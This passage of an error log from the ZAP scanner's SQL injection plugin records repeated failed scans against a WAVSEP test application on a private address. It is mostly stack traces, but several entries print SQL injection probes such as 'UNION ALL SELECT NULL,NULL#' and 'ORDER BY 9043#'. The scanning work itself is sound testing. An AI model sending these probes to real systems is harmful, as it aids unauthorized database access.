org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680902 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680902 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680903 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680904 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 9043#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) ORDER BY 9043# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680905 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680906 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680907 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680915 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680916 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680923 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680924 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680925 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680926 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin 